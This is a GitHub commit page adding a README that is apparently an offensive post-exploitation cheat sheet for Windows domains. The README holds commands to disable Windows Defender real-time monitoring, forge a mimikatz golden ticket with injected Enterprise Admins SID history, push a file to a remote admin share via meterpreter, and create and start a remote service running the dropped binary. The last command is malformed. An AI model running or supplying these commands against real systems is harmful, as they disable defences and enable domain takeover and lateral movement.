Skip to content

Commit

Permalink
Create README.MD
Browse files Browse the repository at this point in the history
  • Loading branch information
icryo authored May 29, 2019
0 parents commit f0f26e2
Showing 1 changed file with 19 additions and 0 deletions.
19 changes: 19 additions & 0 deletions README.MD
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@

##Disable Windows Defender:
powershell Set-MpPreference -DisableRealtimeMonitoring $true

SID Hopping:
mimikatz.exe | kerberos::golden /user:<dc>$ /krbtgt:<krbtgt ntlm hash> /domain:<currentdomain> /sid:S-1-5-21-<currentSID> /sids:S-1-5-21-<newSID>-519 /ptt

upload to another host via meterpreter:
upload /path/to/local/file \\\\remotemachine.com\\C$\\Windows\\Temp\\Blah

Make a service remotely:

sc \\remotemachine.com\ create <servicename> binpath= c:\windows\temp\binary.sys

Start service:

sc \\remotemachine.com\ create start <servicename>


0 comments on commit f0f26e2

Please sign in to comment.